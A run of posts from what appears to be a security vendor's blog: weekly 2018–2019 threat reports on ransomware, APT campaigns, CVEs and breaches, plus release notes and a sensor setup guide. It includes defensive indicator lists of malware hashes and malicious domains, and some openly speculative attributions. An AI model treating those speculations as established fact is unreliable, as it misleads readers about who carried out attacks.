Cookies, while a difficult New Year’s resolution to quit, were until recently an easy trail for any marketing team to follow. Now with increased security risks and international laws, people have the right to be tracked if they wish via the Cookie Law. While this is an incredibly smart safety feature, it puts a huge roadblock in the way of digital marketing.

Not that cookies are the only way to run a successful digital marketing plan, but it does pose the question of, “where do we go from here?” The answer? Build your team so that IT and marketing can exist together in a safe, secure relationship  environment.

Build your flock

We as marketers must prove ROI over and over again; with our team, our technology, and our tactics. But how can this happen when some typical, often successful marketing tactics are now considered risky?

“It is critical that the marketing organization understands the importance of working with IT on security protocols when introducing new technology to the organization for the security of the overall business.”

Little things like mentioning not to open an email or implementing mandatory use of security programs is the fastest way to avoid a future issue. Something as simple as saying, “Hey, if you see an email from me asking for money, I can promise you it is not really from me. I will never send that in an email.” (Something my CEO recently said on a work call, but it made sense. Lots of sense.)

Can marketing be successful and still be safe? Can it “swipe right” on the proverbial seesaw of safety and satisfaction, or is it a friends-without-benefits sort of thing? A relationship that keeps volleying over a net of exposure barely able to skim the top without being pummeled to the ground can’t survive, can it? The answer is Yes. Very strongly, Yes.

We just might not be compatible… ¯\(ツ)

Where do we go from here? Such is life, you win some you lose some. But that doesn’t necessarily mean it’s over between cybersecurity and marketing. It simply means, like all things, it must evolve. Work with your IT team on ways to improve security, especially when introducing new technology or bringing on new employees. Alongside budgets, social media calendars, and tradeshow requests, marketers need to now include a security plan. Teams need to be trained, protocols put into place (two-factor anyone?), and real conversations need to be had on how to properly work in a technical space.

It’s easy to fall back on old habits (and we all know those die hard) but simple things like keeping passwords in an Excel doc inside your Google Drive needs to never happen again. Create a protocol for a security breach, hand employees company laptops with safety programs already installed, train your less techy-team on things that should be shared versus things that you need to just not. Digital marketing as a whole is going to continue to change and these hackers, aka people looking for vulnerability, are going to as well.

Threat Report Wednesday January 2nd 2019

on January 2, 2019

Happy new year! We’re going to close out 2018 with Ryuk ransomware hitting the press and ring in 2019 with some new year hacktivity by two threat actors.

Tribune Publishing held hostage by Ryuk

On December 29, 2018, it was widely reported that Tribune Publishing was unable to publish Saturday editions of major U.S. newspapers, including the Los Angeles Times, the San Diego Union-Tribune, the Chicago Tribune, and the Baltimore Sun. The disruption also affected the distribution of the Wall Street Journal and the New York Times on the West Coast. Tribune’s disruption was caused by ransomware infection. The disruption affected every Tribune market across the United States. Tribune Publishing has recently been divesting from newspapers in favor of online content generated by robots. Which likely means, they weren’t paying attention to printing facilities the way they should. Obviously, we need more legislation and compliance standards for securing news media. Or, we’ll end up with a resurgence of incidents similar to the Max Headroom incident.

The LA Times recently confirmed that the printing house was targeted by threat actors in North Korea. Ryuk ransomware is a targeted strain that is attributed to Lazarus Group. The implication of North Korea does not confirm that the incident was intended to disrupt the activity of the U.S. press, but indicates that some aspect of Tribune Publishing, or their connected publications, were targeted for financial gain by the ransomware strain.

Ryuk ransomware has appeared in campaigns targeting large organizations both in the United States and around the globe. Ryuk typically targets enterprises that are capable of paying a lot of money in order to restore operations, suggesting that operations using this ransomware are primarily financially motivated. It first emerged in August 2018 and in the space of just days infected several organizations across the U.S., encrypting PCs, storage and data centers of victims, as well as demanding 15-50 BitCoin in ransom. However, the attacks are highly targeted with perpetrators conducting tailored campaigns involving extensive network mapping, network compromise, and credential stealing in order to reach the end goal of installing Ryuk and encrypting systems.

Even though Ryuk has been used by the financially motivated, I can’t help but wonder about ulterior motives. Maybe this is a twofer. It seems to me, America is already questioning where it can get factual news from and shutting down trustworthy lines of information which is dangerous. Digital and print news was disrupted for millions of people. There are groups that don’t want information to be open, accessible, or intelligible. Journalists have been targeted this past year and now the threats are moving upstream to the publishers and printers.

TDO threatens release of 9/11 insurance docs

In what very well could have been the new year somewhere on earth, “Thedarkoverlord” (TDO) claimed to have stolen approximately 18K documents from Hiscox Syndicates, National Life Group, Advantage Life Investment Bank, Lloyds of London, and Silverstein Properties and threatened to share documents related to 911 attacks publicly.

TDO is known to have targeted the production studio for Netflix, medical centers, and private businesses across the United States. TDO provided a link for a 10GB archive of allegedly stolen files in their extortion note and threatened to release relevant decryption keys to unlock different sets of files in exchange for an undisclosed ransom fee in Bitcoin from the victims. It is unclear at present exactly which files the actor stole, but researchers believe it is certainly an attempt to capitalize on conspiracy theories surrounding the 911 attacks. My tinfoil hat is buzzing with excitement.

Motherboard reports that Hiscox Group confirmed hackers had breached and likely stolen files related to litigation around the 911 attacks from a U.S. law firm that advised the company, “The law firm’s systems are not connected to Hiscox’s IT infrastructure and Hiscox’s own systems were unaffected by this incident. One of the cases the law firm handled for Hiscox and other insurers related to litigation arising from the events of 911, and we believe that information relating to this was stolen during that breach,” the Hiscox spokesperson wrote in an email.

Don’t sue me for saying so, but lawyers have the worst security. If I was going to take down the largest insurer in the world, I would definitely work my way through a low security backdoor, like their lawyer. We should be treating law firms as vendors with remote access in terms of vendor risk management

New World Hackers aim at Gulf Coast govs

New World Hackers have been going on a new year spree dumping data from, and a number of smaller government organization around the region. They don’t exclusively target government organizations, but the lowest bidding government contractor isn’t always good at application security. Plus, opportunity makes a great motive.

The group also disclosed a breach of Lenovo through their Twitter accounts, but the data dumps were taken down from ghostbin before I could confirm them. Roughly 127K customer records and 1M user records were reportedly exposed in the breach.

Previously, the group took credit for database breaches at Atlanta International Airport and Colorado Government organizations.

Getting the Most Value from Threat Intelligence

on January 2, 2019

In a previous post, we described threat intelligence as “organized and analyzed information about potential threats to your organization.” It is easy to say having that information is important, but the value of threat intelligence is not decided when it is created. The value is determined when threat intelligence is put into action. To illustrate this point, let’s look at an app called Zillow. Zillow provides users with real estate data about homes they want to buy, sell, or rent. This is useful for someone who is looking to perform those actions with real estate, but for most users, the value of the data is lost because they never put that knowledge into practice. The same thing happens with threat intelligence when it is consumed by an organization. Value is determined once the intelligence is put to some action.

How do you determine value?

There are many ways threat intelligence can be utilized to create value. One way is to create a security awareness training program based on the known threats against a vertical. An organization can take that threat intel, understand what the attacks are, where they are coming from, and how they will affect the organization. From this information, one can then create a training program for the employees of the organization to change their behaviors in order to prevent them from being susceptible to the attack vectors. People can be a great defense when it comes to securing an environment, and it is valuable to keep them aware and trained on best practices. Threat intelligence can help shape that curriculum.

Another way threat intelligence can be used to create value for an organization is by reducing operational risk. Operational risk is any event that disrupts business processes, and a successful #cyberattack would definitely disrupt business. Focusing on the threat intelligence that is most relevant to the type of business one does is key in getting the most value. For example, if a power company is threatened by nation-state actors, they are not going to be as concerned by some script kiddies looking for low-hanging fruit out on the Internet. They will be more interested and focused on the advanced threats coming from specific areas in the world and mitigating those threats. Understanding how those threats come into fruition will help them reduce operational risk within a given timeframe, providing them tremendous value.

In addition to reducing operational risk, threat intelligence can also help a business focus on their priorities when it comes to security. Many businesses are not sure about how much money, time, and resources they will need to invest into a security program. There are a lot of tools available to provide defensive and preventative measures, but many take time to setup, personnel to manage them, and are costly (even before the other associated costs are accounted for). Understanding what attacks are relevant to an industry or business, and the severity of those attacks can help one make the decision on where security should be focused as well as what policies need to be put in place in order to maintain business efficiency and profitability.

Discovering value: The Perch way

Threat intelligence by itself does not carry much value. Value is discovered by how threat intelligence is applied in an organization. For us at Perch, we apply threat intelligence at the network level. By correlating network traffic going in and out of an organization to threat intelligence from multiple threat intel communities, we not only provide a comprehensive look at what is going on in an environment, we also provide specific context to any alerts that are created from our sensors. We have completely automated the process of applying threat intelligence. We have a group of security analysts at our Security Operations Center applying human intelligence to those alerts, creating a low-footprint, high value return to any organization using our service.

If you have any questions about Perch and what we do, please request a demo. We will be more than happy to help you learn where you can get the most value out of applying threat intelligence to your organization.

Release Notes

December 28, 2018

  • Add Django command for printing IP counts
  • Better error messages for ConnectWise setup
  • Allow MSSPs to change preferences of users they manage

  • Fix null bugs on the UI
  • Fix styling of countdown timer on alert rows
  • Remove deleted MSP users from all managed teams

Threat Report Thursday December 27th 2018

on December 27, 2018

We hope you had a happy holiday, but it is time to get back to the grind. Holiday cheer wasn’t the only thing spreading this season. Tenable gave the gift of vulnerability disclosure to Cisco, the Department of Justice handed out indictments for Chinese hackers like candy, and 500K students are eagerly waiting to find out what they will get from the San Diego School District.

Cisco ASA privilege escalation disclosed and patched

Cisco Adaptive Security Appliance (ASA) Software is reportedly affected by privilege escalation vulnerability CVE-2018-15465. Researchers at Tenable discovered that a remotely authenticated, unprivileged user can change or download the running configuration. And, that’s bad.

The vulnerability could be exploited by an attacker sending a crafted HTTP request as an unprivileged user. The Cisco ASA Web management interface improperly validates user. The attacker can retrieve files (including the running configuration) or upload and replace the software image. Cisco released an update to patch the vulnerability.

CVE-2018-15465 impacts ASA software running on any Cisco product that has Web management access enabled, with command authorization disabled. Users are advised to update to the latest patch according to the Fixed Releases table located in the Cisco Security Advisory.

Stone Panda indicted and linked to Chinese state-sponsored economic espionage

The United States Department of Justice indicted two Chinese nationals, Zhu Hua and Zhang Shilong, who participated in a 12-year campaign that targeted U.S. managed security providers. This duo is believed to be part of Stone Panda aka Red Apollo (APT10). The activity breached at least 45 companies through their managed service providers (MSP) in 12 countries. The campaign was performed by a company fronting for the Chinese Ministry of State Security (MSS). The indictments show MSS’ continued use of front companies for international economic/technology espionage operations. Washington’s indictments send a clear message to China, intrusions to improve economic competitiveness are unacceptable.

The modus operandi for the campaign was straight-forward. Leverage stolen credentials to gain access to an MSP network and use the MSPs access to steal their clients’ intellectual property. A little birdie told us these IPs were used in APT10 operations: 

500K records exposed in San Diego school district breach

Stolen credentials aren’t just being reused against MSPs and their clients. Hackers are credential phishing, reusing previously breached passwords, and deploying password stealing malware to gain access to your networks and the networks you trust. The education sector has recently been learning that lesson.

San Diego School District recently disclosed a data breach for 500K students. We regularly hear about universities being targeted, but public-school districts are a target too. Many of the social security numbers breached won’t be valuable until the students can get approved for credit; but children are victims of identity theft as well. If you were born today, just how long would it take for your SSN to be breached? I’m betting that a large percentage of children born today will have PII breached before they can talk.

Attackers phished San Diego School District faculty to gain access to just about every type of sensitive information they had from the last 10 years including:

  • Student enrollment information like schedule, discipline incident information, health information, attendance records, transfer information, legal notices on file, and attendance data
  • Student and staff State Student ID Number
  • Student and staff parent, guardian, and emergency contact personal identifying information (including first and last name, phone numbers, address, email address, employer information)
  • Staff benefits information
  • Staff payroll and compensation information (including viewable paychecks and pay advices, deduction information, tax information, direct deposit financial institution name, routing number and account number, salary and leave information)

Earlier this month Cape Cod Community College (CCCC) was cyber-swindled for 800K dollars. The threat actor was using phishing emails with attached viruses to land a first stage infection. The second stage infection was password stealing malware. The Boston Globe reported that CCCC President, John Cox, emailed staff and students stating, “the school believes the same hackers tried to infiltrate other colleges in the area” but said “he did not know which ones.” This statement perfectly highlights that organizations need to join relevant information sharing communities.

That’s all for now. So long, and thanks for all the phish.

Threat Report Wednesday December 19th 2018

on December 19, 2018

This week we’re covering critical vulnerabilities discovered in Huawei routers, Jenkins continuous build automation servers, and SQLite databases. Additionally, we’re going to review a threat actor that is taking aim at critical U.S. infrastructure.

Security community calls Huawei’s bluff on security claims

Huawei’s integrity has been called into question recently. Many countries are taking U.S. leadership and canceling Huawei orders. Canada has arrested the Huawei CFO for extradition to the United States. During all this, Huawei has asked the U.S. to put up or shut up. And, the security community has responded with proof. A staggering vulnerability report for Huawei routers (CVE-2018-7900) has been released and Huawei doesn’t just make exploitation possible, they make it easy.

There is no spray and pray necessary for attackers. You can find all vulnerable routers with a Shodan/ZoomEye. There is no need to fail a login. The login page indicates if the default password has changed. This makes detecting abusive activity difficult because attackers don’t make much noise, and it’s possible to generate a list of 100 percent exploitable targets based on a dork query.

Jenkins makes guests feel at home with anonymous to admin access

CyberArk’s security researchers discovered two vulnerabilities exposing  Jenkins  servers.  Jenkins  is a Web application for continuous integration built in Java that allows development teams to run automated tests and commands on code repositories based on test results.  CyberArk  disclosed the flaw to  Jenkins  after they detected an exploitation attempt against  Jenkins  servers. The actors used two different vulnerabilities to launch attacks. The first is  CVE-2018-1999001, a flaw that allows an attacker to remove files from the  Jenkins  master file system. The second is  CVE-2018-1999043, which allows an attacker to create ephemeral user records in the server’s memory. Both of these vulnerabilities have been addressed and fixed. ZDNet was able to discover over 2,000 vulnerable  Jenkins  servers within a few minutes. Researchers believe that the total number of vulnerable servers might even be over 10,000. Users and organizations must keep software and firmware up to date with timely patch updates to mitigate attacks. File integrity monitoring on a Jenkins server could detect the security configuration file being moved.

Magellan vulnerability discovered in SQLite

Last week, Security researchers from Tencent Blade Team have discovered a remote code execution vulnerability in SQLite dubbed Magellan. SQLite is a widely used and well-known database utilized in all modern mainstream  operating systems  and software, meaning that this vulnerability holds a wide range of influence.

Researchers state that  Google  has fixed this vulnerability, however, Google is not disclosing the details of Magellan at this time as they are pushing vendors to fix it as soon as possible. Devices or software that use SQLite or Chromium are affected, and the dangers of exploitation include remote code execution, leaking program memory, or causing program crashes.

The vulnerability can be triggered remotely, for example, a target visits a particular Web page in a browser or any scenario that can execute SQL statements. Researchers did not observe any abuse of Magellan in the wild at the time of publishing. There is currently no CVE for this vulnerability. We will likely see this weaponized into a new or existing exploit kit or as part of a scanner’s arsenal of exploits over the next week or two. So, update SQLite or your applications that use SQLite, like Chromium based browsers (Chrome, Vivaldi, Opera, and Brave). SQLite products are advised to update to 3.26.0 and Chromium users are advised to update to the official stable version 71.0.3578.80.

Sharpshooter takes aim at critical infrastructure

McAfee  security researchers discovered an advanced threat actor they call “Sharpshooter” targeting defense organizations and  critical infrastructure  sectors using source code from the infamous Lazarus group.  McAfee  disclosed the flaw on December 12, 2018, after they detected exploitation attempts against organizations in nuclear and defense sectors.  The threat actor is executing the first stage exploit through a malicious office document that contains a weaponized macro. The macro downloads the second stage backdoor, dubbed Rising Sun, which performs reconnaissance on the victim’s network. Once executed, the victim’s data will be sent to  a C2  server for monitoring by the actors to launch the attacks. Researchers have detected 87 victims from different industry sectors with this vulnerability. First stage infections that start with an office document are typically spread through malspam.

First Stage – Ips & Domains




Second Stage - IPs & Domains








Indicators of Compromise: The Good, the Bad, and the Ugly of Threat Intelligence

on December 18, 2018


We’re having a lot of great conversations around threat intelligence lately, so we’ve decided to address threat intelligence as part of a series with this post being part one.

What is threat intelligence?

Threat intelligence is defined as organized and analyzed information about potential threats to your organization. 



Threat intelligence is best when qualified and shared. The best security value comes from sharing information regarding the sighting of IOCs. The reason why threat actors have an advantage is their willingness to share tools and techniques. 

 Lately, defenders have started to ask why they can’t do the same thing? Historically, we have been unwilling to share information. Information can be shared to level the playing field. This is the trend with Information Sharing Analysis Centers and Organizations (ISAC/ISAO). This approach enhances the security posture of the organizations that participate.

 Perch is here to help you benefit from intelligence provided by ISAC/ISAOs in new ways, by enabling you to contribute to these communities with very little effort on your part. Let’s dive into how we use this concept and how you can participate with Perch.

Intel driven analysis: The Perch way

In a threat detection world, a system can only be as good as the intelligence it works with. In order to build the best threat detection capabilities, it’s essential to work with as much threat intelligence as possible. But this drowns out the signal. Low-fidelity intelligence can be noisy and generate a lot of false positives (indicators that need to be tuned out). Poor intelligence hurts threat sharing communities more than it helps. It lowers the reputation of the intel community by diluting true and false positive alerts produced. This causes community members to question the value of the community. 

Where does threat intelligence come from?

Threat intel delivered

Threat intel delivered by the Flockchain

Threat intelligence comes from many sources. Some are created by threat intelligence analysts, intelligence community members, or from open source intelligence. These Indicators of Compromise (IOC) are ingested into our system as a signature that potentially indicates compromise. When Perch sees activity that matches these signatures we flag, analyze, and notify you if it is a threat. 

Perch consumes intelligence from ISACs and ISAOs, subscription-based feeds (Cisco Talos, Emerging Threats, and Intel 471), free feeds (Department of Homeland Security), and other open and closed community-based feeds. 

Good intelligence vs. bad intelligence



We like when you share, so we’ll share too. We are not here to pass judgement on the intel you share. When we refer to good intelligence, we mean indicators that have a high likelihood of indicating compromise. At Perch, we enable intel sharing communities to refine the intelligence they share. We do this by providing peer sightings, true/false positive ratio, and analyst notes. Intelligence communities then understand how their intelligence is performing by qualifying it against our customer data and sharing it with the community.

Bad intelligence has a low probability of indicating a compromise. An example is an IP-based indicator. This is true for a number of reasons. An IP does not always represent the true source of a threat (e.g. content delivery network (CDN) or shared hosting provider that hosts multiple sites on one IP address). Virtual hosting providers can host up to 10K domains on a single IP address. Without a related domain for that IP it’s impossible to tell if the observed behavior is consistent with the threat. Without having a second indicator to pair with it, an IP indicator is not the best indicator. The best indicators of compromise have multiple data points like an IP, plus a domain.

Curious to find out more?

Keep an eye out for the rest of this series, coming soon.  

And for more information on how we can help bolster your organization’s security posture through threat intelligence, please reach out to us to schedule a demo.

Threat Report Friday December 14th 2018

on December 14, 2018

There has been a lot of interesting development over the last week, so let’s roll through it. In response to world events, nation-states are being implicated in hacking each other. Microsoft and Adobe released critical patches to cover code execution vulnerabilities. Malware authors are increasingly targeting Mac OS X. And, an APT takes aim at academics.

After poisoning ex-spies, Russian government hit with Poison Needles

Adobe has now released a patch for CVE-2018-15982 that was recently used in compromising a Russian medical facility. 360 Core Security researchers disclosed findings related to a security incident from late November 2018 involving the FSBI Polyclinic No.2.

The attacker used spear-phishing with an attached doc that appeared as an in-depth employee questionnaire to exploit a recent flash 0-day (CVE-2018-15982), and deploy a customized trojan with the ability to detect when it has been caught and self-destruct. The primary function of this trojan seems to be maintaining persistence, avoiding detection, and exfiltrating data to an IP in Romania. Researchers named the attack as “Operation Poison Needles” as the target was a medical institution; but I think the name might be fitting for other reasons. The attacker launched the trojan from a compressed package. The PE payload backup.exe masqueraded as an NVIDIA control panel application with detailed file descriptions and version numbers.  

Some commentators believe that this was in response to the Kerch Strait incident which occurred on November 25, 2018. I believe this is a response to Russian activity, but not the Kerch Straight incident. What relevance does an attack on a Russian health organization have in response to a military aggressiveness? I believe this may be a response related to the UK poisoning plot targeting former Russian agent Sergei Skripal. This customized trojan and spear-phishing seem to be an information grab. The FSBI Polyclinic 2 could be the facility that created or stored the Novichok nerve agent used in the poisoning plot. Poison Needles may have been an operation to find evidence related to that attack.

Samples of the customized Trojan were first uploaded to virus total on November 29. The Kerch Straight incident occurred on November 25. If this were a response to any incident, then it was likely a failure. If I were a nation-state hack team, I’d like to get more use out of custom malware and an Adobe 0-day than four days. Although, four days is plenty to completely compromise a network. So, maybe they got what they were looking for. Either way, I feel the response is not relevant to the Kerch Straight incident and so it must be related to something else… or maybe nothing at all. Perhaps the timing was meant to provide false attribution to Ukraine.  


- 2abb76d71fb1b43173589f56e461011b  
- 92b1c50c3ddf8289e85cbb7f8eead077
- 1cbc626abbe10a4fae6abf0f405c35e2

More details about:



Windows patch Tuesday - December

Adobe isn’t the only software company releasing some serious patches. This week we’ve got another critical patch, Tuesday from Microsoft. The patch includes a fix for the Win32k Privilege Escalation Vulnerability (CVE-2018-8611) which allows attackers to exploit the Windows Kernel to run arbitrary code to install programs, modify data, or create accounts. The fix also covers a Heap Overflow remote code execution (RCE) that’s being actively exploited in Windows DNS Server when it failed to properly handle a specially crafted request. Attackers can exploit this vulnerability to run arbitrary code in the context of the Local System Account.

OSX.DarthMiner brings MAC OSX to the Darkside

Some malware writing Sith Lords are force pulling Macs into a crypto mining botnet with malware dubbed OSX.DarthMiner. In a recent report from malwarebytes, researchers profiled the Mac malware and found that it was combining EmPyre for a backdoor with XMRig for crypto mining. Although this malware seems focused on mining it does have the ability to execute commands specified by a remote user through EmPyre. DarthMiner is likely stealing passwords and other such sensitive information.  

The malware is being distributed through a fake version of a popular Adobe pirating tool Adobe Zii.

And they say the Empire did nothing wrong.


- ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e

More details about:

Academia threatened with STOLEN PENCIL

ASERT researchers from Arbor Networks have disclosed their findings on STOLEN PENCIL, an APT campaign targeting academic institutions. Active since at least May 2018, researchers have not attributed the campaign to any one actor, however, they identify the activity as “possibly originating from DPRK (North Korea).” Attackers appear interested in collecting credentials.  

Targets are sent spear-phishing emails that lead to a website displaying a lure and are prompted to install a malicious Google Chrome extension. Many targets are specialized in biomedical engineering, suggesting a possible motivation. Researchers state that poor operational security led to users finding open Web browsers in Korean, English-to-Korean translators open, and keyboards switched to Korean. The attackers use built-in Windows admin tools and commercial off the shelf software to “live off the land.”  

Post-exploitation persistence is maintained by harvesting passwords from a wide variety of sources such as process memory, Web browsers, network sniffing, and keyloggers. Researchers state that they have not yet discovered evidence of data theft. The following indicators of compromise were released with ASERT’s findings.


- 9d1e11bb4ec34e82e09b4401cd37cf71
- 8b8a2b271ded23c40918f0a2c410571d
- 2ec54216e79120ba9d6ed2640948ce43
- 6a127b94417e224a237c25d0155e95d6
- fd14c377bf19ed5603b761754c388d72
- 1d6ce0778cabecea9ac6b985435b268b
- ab4a0b24f706e736af6052da540351d8
- f082f689394ac71764bca90558b52c4e
- ecda8838823680a0dfc9295bdc2e31fa
- 1cdb3f1da5c45ac94257dbf306b53157
- 2d8c16c1b00e565f3b99ff808287983e
- 5b32288e93c344ad5509e76967ce2b18
- 4e0696d83fa1b0804f95b94fc7c5ec0b
- af84eb2462e0b47d9595c21cf0e623a5
- 75dd30fd0c5cf23d4275576b43bbab2c
- 98de4176903c07b13dfa4849ec88686a
- 09fabdc9aca558bb4ecf2219bb440d98
- 1bd173ee743b49cee0d5f89991fc7b91
- e5e8f74011167da1bf3247dae16ee605
- 0569606a0a57457872b54895cf642143
- 52dbd041692e57790a4f976377adeade


- bizsonet.ayar[.]biz
- bizsonet[.]com
- client-message[.]com
- client-screenfonts[.]com
- *.coreytrevathan[.]com (possibly compromised legitimate site)
- docsdriver[.]com
- grsvps[.]com
- *.gworldtech[.]com (possibly compromised legitimate site)
- itservicedesk[.]org
- pqexport[.]com
- scaurri[.]com
- secozco[.]com
- sharedriver[.]pw
- sharedriver[.]us
- tempdomain8899[.]com
- world-paper[.]net
- zwfaxi[.]com

IP Addresses:


Release Notes

December 14, 2018

  • Uncheck “notify customer” by default when multi-selecting
  • Replace the confusing “suppression” icon
  • Add escalation-related filters to public API
  • Add a private community for SEI
  • Add SWIFT ISAC community
  • Enhancements to the ConnectWise Integration
  • Allow MSSPs to link and unlink existing Perch customers

  • Fix critical SLA issues
  • Fix import of newrelic
  • Fix import and relation name
  • Fix action for deleting SLAs

Threat Report Thursday December 6th 2018

on December 6, 2018

This week we’re covering a developing story around a Kubernetes vulnerability that is still shrouded in mystery, a string of high-profile data breaches, and following up on the mobile spyware topic from last week.

You Never Forget Your First Hack

You’ve been hacked. How did this happen? You learn a lot from responding to security incidents and Kubernetes is learning some of those lessons now, the hard way. Red Hat security researchers have recently discovered Kubernetes’ first major security flaw, CVE-2018-1002105, a privilege escalation vulnerability that targets Kubernetes-based services and products.

Red Hat disclosed the flaw to Kubernetes after they detected an exploitation attempt to the Kubernetes API server’s Transport Layer Security (TLS) credentials. Red Hat also noticed that the vulnerability makes it possible for any user to gain full administrative access on any machine running with the Kubernetes platform. Researchers have detected active attacks using this vulnerability. However, it is unclear at present how this vulnerability is being delivered because the de-auth requests are made over an established connection and do not appear in Kubernetes API server audit logs.

The affected versions are Kubernetes v1.0.x through v1.9.x. Users and organizations were advised to update to one of the following patched versions of Kubernetes: v1.10.11, v1.11.5, v1.12.3, and v1.13.0-rc.1. No indicators of compromise were released with Red Hat’s findings; however, they have published an in-depth technical report.

Big Data Score in High-Profile Data Heist

We’ve seen a burst of high-profile data drops recently. Data from over 600 million users was recently compromised in just three breaches. The Nation Republican Congressional Committee (NRCC), Quora, and Marriot have all recently disclosed breaches. Each of these breaches can teach us different lessons related to merger and acquisition security, the benefits of security monitoring, and encrypting data at rest.

Although there was a low number of user accounts compromised in the NRCC hack, it only takes one compromised user to have a data breach. NRCC was notified about the breach through a managed security service provider (MSSP). The NRCC then reported the breach to Crowdstrike, one of their security vendors. It’s good that the NRCC had security monitoring. This breach could have lasted for more than the “several months” that attackers reportedly maintained access to compromised accounts.

If this were a hacktivist group, we would expect to see a data dump. If this were a profiteer, we would expect to see a ransom. Neither of these scenarios has occurred. That gives us good reason to believe that the threat actors are not motivated by money or protest. Allow me to be speculative. The threat actors are likely after the intelligence. With enough private communications between Republican politicians, they could gain the leverage needed to ease sanctions related to ongoing Crimea occupation and DNC email hack. During this time, we have seen exactly this occur as House Republicans cool on Russian sanctions.

Quora recently lost user information related to 100 million users. Although the information was not particularly sensitive information, it did include email addresses and hashed passwords. There was no indication if the passwords were salted. And there was no mention of a salt being used in the password hashes. Millions of these hashes have likely been cracked. We’ve already heard private reports about this data being leveraged to attempt to access email accounts. If you’ve ever used Quora with a common password, you should reset that password wherever you have used it.

On Friday, November 30, 2018, Marriott Hotels publicly disclosed a breach impacting the network of their subsidiary, Starwood Hotels and Resorts. This shows the danger of mergers and acquisitions. When you buy another company their security problems become your security problems. Amazon saw this with Twitch, and Marriott is now seeing it with the Starwood acquisition. The official statement emphasizes that the Marriott network was not involved, as the investigation only identified unauthorized access to Starwood’s network.

According to the investigation, the intrusion occurred on or before September 10, 2018, and targeted guest information from reservations. Marriott estimates that the activity affected 500 million guests. Compromised data included a combination of names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, reservation dates, and other data points. Marriott also stated that an unknown amount of payment card numbers and payment card expiration dates were accessed with other customer data. It is not clear if the accessed data was successfully exfiltrated by attackers, so we should assume that it definitely was.

Marriott states during their investigation, there had been unauthorized access to the Starwood network since 2014. The investigation was partially alerted to the activity due to the actors copying and encrypting data from the Starwood Guest Reservation Database. Marriott was able to decrypt the data and determined it was from guest reservations on or close to September 10, 2018. It is unclear if the data was encrypted to help with exfiltration or to destroy evidence of the intrusion. However, the steps taken by the actor to hide the stolen data, or potentially destroy it, show their interest in the sensitive personally identifiable information and ensuring a delayed discovery that such information had been compromised. Speaking of stealthy backdoors, ESET published follow-on research from Operation Windigo related to the use of stealthy SSH backdoors to maintain persistence on compromised hosts. We looked at some of the published indicators and searched for them in Perchybana. No indicators were observed in the last 30 days that match this threat. If you’re a Perch customer, you’re in the clear.

11 Critical Android Vulnerabilities Patched Amid Pegasus Abuse Claims

Google recently patched 11 critical code execution vulnerabilities in Android. Nine were tied to escalation-of-privilege (EoP) bugs. One of the few EoP bugs (CVE-2018-10840) that linked to an external description revealed the flaw was tied to the Android Kernel component (ext4 filesystem). Forty-two high criticality vulnerabilities were also patched. The timing couldn’t be better for Journalists using android. There has been a lot of talk recently about NSO Pegasus mobile spyware abuse. NSO Pegasus spyware is only sold to government organizations and should only be used against criminals and terrorists, yet it has been increasingly used to target journalist cellphones. NSO Pegasus spyware was found on Abdulaziz’s phone. The installation has been linked to the Saudi government and he believes it has something to do with the murder of U.S. journalist Khashoggi.

On Sunday, Abdulaziz’s lawyers filed a lawsuit in Tel Aviv alleging NSO broke international law by knowingly allowing its spyware to be used to infringe upon human rights. “NSO should be held accountable in order to protect the lives of political dissidents, journalists, and human rights activists,” said Abdulaziz’ lawyer, Alaa Mahajna, speaking to CNN.

“The hacking of my phone played a major role in what happened to Jamal, I am really sorry to say,” Abdelaziz told CNN. “The guilt is killing me.”

The lawsuit claims that in the months before the killing, the royal court had access to Mr. Khashoggi’s communications about opposition projects with Mr. Abdulaziz because of the spyware on Mr. Abdulaziz’s phone.

Installing a Small Perch Sensor for the SMB, Seamlessly

on December 4, 2018

Are you worried about those pesky hackers getting into your network and owning your devices? Have you ever wanted enterprise-grade detection capabilities on your small residential or commercial network? Do you search the internet regularly looking for the latest TTPs the bad guys are using (like the ones outlined in our weekly threat reports) and wish you could use that info to hunt for threats in your network? The good news is, you can! I’m here to help you figure out how.

It’s dangerous to go alone, take this with you

Tiny Form Factor

This post is intended for the folks who like to consider themselves “power users”, but who may not have a full-on enterprise-grade network with all the bells and whistles that a multi-million-dollar company can afford. If you feel like this applies to you, look no further. You’re in the right place. You should also know that you’re not alone. Y’all deserve all the protection the big boys get, even though you may not have the same budget they do.

Here at Perch, we believe that good security should be easily available for everyone, small and medium sized businesses included. This is why we offer a solution that can scale from the smallest to the largest of customers, with a similar experience for everyone.

Our sensors and software can be found everywhere, from the smallest home networks (like the one in my apartment), all the way up to large financial institutions with an annual recurring revenue of over five billion dollars. I’m going to assume the bigger organizations don’t need my help figuring this stuff out. So, I’m just going to focus on what is required to setup a tiny form factor sensor (pictured above) in a small residential network with some commercially available, low-cost equipment.

So, what’s required to get setup and running with a Perch sensor?

Turns out, not a whole lot.

Assuming you’ve already got your network topography in place, it’s really quick and easy to get setup. It doesn’t require an advanced level of knowledge to setup either (if you can use a Roku, you can setup a Perch sensor). It’s not something that requires a massive network overhaul where you have to take everything down (and pray that it comes back up). It takes about 20 minutes to setup the sensor. We can Uber Eats you lunch, and you’ll have your sensor setup and running before your food gets there.

Feeling empowered and inspired yet? Good, you should be 😀.

The only network equipment necessary to drop Perch in on your network is simply a switch with the ability to enable port mirroring. We ideally like to sit behind a firewall, so we can see what makes it past the perimeter defenses. But it’s not required to get setup with us. This write up is going to assume you’re setting it up on a small home network, running a firewall at the perimeter behind the modem, and before the switch.

Besides a switch capable of port mirroring, you’ll really only need an internet connection plus a device that handles traffic routing upstream of the switch. In this case, I’m just using the modem provided by the ISP which handles the DHCP for the whole network upstream of the switch that is mirroring out traffic to the Perch Sensor. The cool thing about doing it this way is I’m able to retain the enhanced services from my ISP that include user analytics profiling abilities, metrics collection capabilities, as well as rogue device detection functionality.

If you don’t have a switch capable of port mirroring, a good economical solution might be a managed smart switch like the TP-Link SG105e. This little 5 port switch is really all you need, with room to spare. One port to bring in the traffic from the modem, one port to forward the traffic back out to any other switches or routers downstream (such as your wireless AP), and two ports for the Perch sensor (one to setup as a mirror/tap, and one so the sensor can connect back to the Perch cloud.) You’ll even have a whole port free to leave you room for growth.

Below is a visual of the topography described above:


(in my use case switch 2 is both a switch and a wireless AP)

Some pro tips:

